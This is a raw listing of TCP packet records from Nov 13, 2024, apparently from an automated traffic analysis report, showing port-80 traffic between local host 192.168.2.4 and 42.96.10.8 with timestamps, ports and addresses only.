                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011955976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011970997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011976957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011991024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.012042999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.015904903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.015959978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.015975952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016056061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016104937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016158104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016165018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016180992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016220093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016226053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016236067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016252995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016268015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016274929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016284943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016361952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016407967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016423941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016439915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016490936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016490936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016513109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016529083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016545057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016561031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016567945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016577959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016602993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016675949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016701937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016716957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016732931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016733885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016760111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016769886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016773939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016789913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016813040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016814947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016830921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016839027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016848087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016864061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016880035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016895056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016913891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016916037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016941071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016976118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.016993046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017009974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017019987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017070055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017086029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017093897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017102003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017118931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017133951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017141104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017155886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017182112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017199039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017214060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017225981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017241001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017250061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017255068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017277956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017560005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017584085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017601013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017607927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017617941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017635107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017656088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017714024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017728090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017744064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017759085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017774105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017812967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017817974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017828941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017838955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017844915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017860889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017884016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017955065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017973900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.017993927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018018007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018034935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018040895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018050909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018066883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018074989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018083096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018106937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018111944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018129110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018142939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018151999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018161058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018177032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018201113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018203020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018218994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018225908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018235922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018249989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018274069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018290997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018296003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018296003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018321037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018337011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018346071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018351078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018368006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018378019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018382072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018399000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018423080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018457890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018461943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018512011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018528938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018569946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018594980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018610001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018619061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018627882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018695116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018709898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018718958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018727064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018749952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018769979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018794060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018798113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018814087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018830061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018841028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018846035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018861055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018870115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018877029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018893957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018908024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018918037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018929005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018949986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018965006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018980026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.018994093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019002914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019010067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019033909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019036055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019052982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019058943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019068956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019084930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019099951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019107103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019115925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019121885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019159079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019174099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019188881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019196987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019203901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019222021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019243956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019304991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019310951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019329071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019344091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019366980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019412041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019418001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019440889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019455910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019473076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019483089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019496918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019515038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019525051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019560099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019577026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019660950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019675016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019709110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019723892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019728899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019742012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019747019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019833088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019850016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019866943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019902945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019906998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019920111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019937038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019951105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019958019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019968033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.019980907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.020005941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.020174980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060203075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060220003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060236931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060251951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060267925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060276031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060283899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060311079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060327053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060327053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060327053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060348034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060364008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060369968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060403109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060409069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060425043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060441971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060457945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060472965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060488939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060494900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060513020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060538054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060592890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060614109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060628891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060702085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060725927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060754061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060770035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060794115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060811043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060826063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060839891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060863018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.060966969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.061249018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.061264992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.061281919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.061304092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.061351061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092456102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092473030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092483997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092502117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092511892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092513084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092524052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092535019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092545033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092555046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092556000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092567921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092575073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092580080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092587948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092595100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092602968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092618942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092628002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092633963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092654943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092721939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092732906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092742920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092752934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092765093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.092782021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.098903894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.098984003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099015951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.099050045 CET804973342.96.10.8192.168.2.4
